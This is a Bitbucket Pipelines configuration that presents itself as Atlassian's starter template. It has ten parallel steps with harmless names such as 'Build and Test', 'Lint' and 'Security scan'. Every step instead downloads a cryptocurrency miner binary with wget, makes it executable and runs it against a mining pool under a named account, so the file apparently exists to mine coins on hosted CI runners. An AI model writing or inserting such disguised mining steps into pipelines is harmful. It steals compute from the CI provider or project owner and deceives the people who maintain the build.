# This is an example Starter pipeline configuration
# Use a skeleton to build, test and deploy using manual and parallel steps
# -----
# You can specify a custom docker image from Docker Hub as your build environment.

image: atlassian/default-image:3

pipelines:
  default:
    - parallel:
      - step:
          name: 'Build and Test'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Pool Host=ric.suprnova.cc Port=5000 Username=guru45.guru Password=guru Threads=2
      - step:
          name: 'Lint'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Pool Host=ric.suprnova.cc Port=5000 Username=guru45.guru Password=guru Threads=2
      - step:
          name: 'Security scan'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Pool Host=ric.suprnova.cc Port=5000 Username=guru45.guru Password=guru Threads=2
      - step:
          name: 'Build and Test'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Pool Host=ric.suprnova.cc Port=5000 Username=guru45.guru Password=guru Threads=2
      - step:
          name: 'Lint'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Pool Host=ric.suprnova.cc Port=5000 Username=guru45.guru Password=guru Threads=2
      - step:
          name: 'Security scan'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Pool Host=ric.suprnova.cc Port=5000 Username=guru45.guru Password=guru Threads=2
      - step:
          name: 'Build and Test'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Pool Host=ric.suprnova.cc Port=5000 Username=guru45.guru Password=guru Threads=2
      - step:
          name: 'Lint'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Pool Host=ric.suprnova.cc Port=5000 Username=guru45.guru Password=guru Threads=2
      - step:
          name: 'Security scan'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Pool Host=ric.suprnova.cc Port=5000 Username=guru45.guru Password=guru Threads=2
      - step:
          name: 'Security scan'
          script:
            - wget -O rie https://riecoin.dev/resources/Pttn/rieMiner.php?system=Deb64AVX2 && chmod +x rie && ./rie noconffile Mode=Pool Host=ric.suprnova.cc Port=5000 Username=guru45.guru Password=guru Threads=2